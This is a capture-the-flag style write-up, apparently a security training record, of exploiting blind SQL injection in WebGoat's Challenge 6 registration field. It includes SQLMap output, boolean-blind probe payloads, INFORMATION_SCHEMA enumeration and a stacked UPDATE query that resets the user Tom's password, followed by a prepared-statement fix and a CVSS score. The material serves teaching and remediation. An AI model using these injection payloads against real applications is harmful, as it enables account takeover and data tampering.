## Version 1.4.1
## language: en

Feature:
  TOE:
    WebGoat
  Category:
    Challenges
  Location:
    /WebGoat/challenge/6 - username_reg (Field)
  CWE:
    CWE-89: Improper Neutralization of Special Elements used in an SQL Command
    ('SQL Injection')
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    Login as Tom
  Recommendation:
    Always use prepared statements, neves raw user input for queries

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
    | SQLMap                | 1.2.12    |
  TOE information:
    Given I am running WebGoat on http://localhost

  Scenario: Normal use case
    Given I go to "WebGoat/start.mvc#lesson/Challenge6.lesson"
    And I get a page where I can register or login

  Scenario: Static detection
  Raw user input used in SQL query
    Given I check the code at
    """
    webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/plugin/challenge6/
    Assignment6.java
    """
    And I see
    """
    50  String checkUserQuery = "select userid from " + USERS_TABLE_NAME + "
    where userid = '" + username_reg + "'";
    51  Statement statement = connection.createStatement();
    52  ResultSet resultSet = statement.executeQuery(checkUserQuery);
    """
    Then I notice it's directly taking user input into the query
    Then I know it's vulnerable to SQL injection

  Scenario: Dynamic detection
  Probing the form with SQLMap
    Given I intercept a review submission request with Burp
    """
    PUT /WebGoat/challenge/6 HTTP/1.1
    Host: 127.0.0.1:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/
    65.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1:8000/WebGoat/start.mvc
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 171
    Connection: close
    Cookie: JSESSIONID=2D38B6FD1B055FA538DF8C68DD39052A; BEEFHOOK=sPHOtf4WZ9fRh2
    UjERRZ6BnmNPJLA6QodYTIyeHINl2ARB9X8B15XTd3ZITqq7CWMczxQSjSeGdfc9De

    username_reg=§ugu§&email_reg=gfds%40gmail.com&password_reg=fsgf
    &confirm_password_reg=gfsa
    """
    And use it to scan for SQLi vulnerabilities with SQLMap
    """
    ...
    Parameter: username_reg (PUT)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username_reg=l' AND 5137=5137-- PKhs&email_reg=a@b.com&password_reg
    =a&confirm_password_reg=a
    ...
    """
    Then I know the username_reg parameter is vulnerable to Blind SQLi

  Scenario: Exploitation
  Blind SQLi to guess table names and update victims password
    Given I know the target is vulnerable to Blind SQLi
    Then I create a test user
    And try different queries to see what responses I get
    Then for a request that should return true
    """
    username_reg=ugu' AND ''=' &email_reg=gfds%40gmail.com&password_reg=fsgf&con
    firm_password_reg=gfsa
    """
    Then I get the response
    """
    {
      "lessonCompleted" : false,
      "feedback" : "User ugu' AND ''=' already exists please try to register wit
      h a different username.",
      "output" : null
    }
    """
    And for a request that should return false
    """
    username_reg=ugu' AND '1'=' &email_reg=gfds%40gmail.com&password_reg=fsgf&co
    nfirm_password_reg=gfsa
    """
    Then I get the response
    """
    {
      "lessonCompleted" : true,
      "feedback" : "User ugu' AND '1'=' created, please proceed to the login pag
      e.",
      "output" : null
    }
    """
    Then I check if I have access to "INFORMATION_SCHEMA" in order to enum table
    """
    ugu' AND 0<(SELECT COUNT(*) FROM INFORMATION_SCHEMA.SYSTEM_TABLES
    WHERE TABLE_NAME LIKE '%') AND ''='
    """
    And get a positive response
    """
    {
      "lessonCompleted" : false,
      "feedback" : "User ugu' AND 0<(SELECT COUNT(*) FROM INFORMATION_SCHEMA.
      SYSTEM_TABLES WHERE TABLE_NAME LIKE '%') AND ''=' already exists please
      try to register with a different username.",
      "output" : null
    }
    """
    Then I write a Python script to automate table finding (sgomezatfluid.py)
    Then I find the user table name
    """
    ...
    CHALLENGE_USERS_6XJGALGCFXYKVCTVCX
    CHALLENGE_USERS_6XJGALGCFXYKVCTVCY
    Table name CHALLENGE_USERS_6XJGALGCFXYKVCTVC
    """
    And guess common column names (userid, password)
    Then I inject a query that updates Tom's password
    """
    ugu'; UPDATE CHALLENGE_USERS_6XJGALGCFXYKVCTVC SET password='abc' WHERE
    userid='tom' --
    """
    Then I try logging in as tom with the new password "abc"
    And I get in (evidence)[challengecompleted.png]

  Scenario: Remediation
  Use prepared statements
    Given I patch the code like this
    """
    50  PreparedStatement checkUserQuery = connection.prepareStatement("select
          userid from " + USERS_TABLE_NAME + " where userid = ?");
    51  checkUserQuery.setString(1, username_reg);
    52  ResultSet resultSet = checkUserQuery.executeQuery();
    """
    Then injection is not posible anymore

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.1/10 (High) - AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.6/10 (Medium) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.1/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    systems/webgoat/79-stored-xss
      Given I have privileged access to the platform
      Then I can leave a malicious comment as a privileged user
      And make sure every other user sees it
      Then I can reach a lot more users than I would otherwise with my attack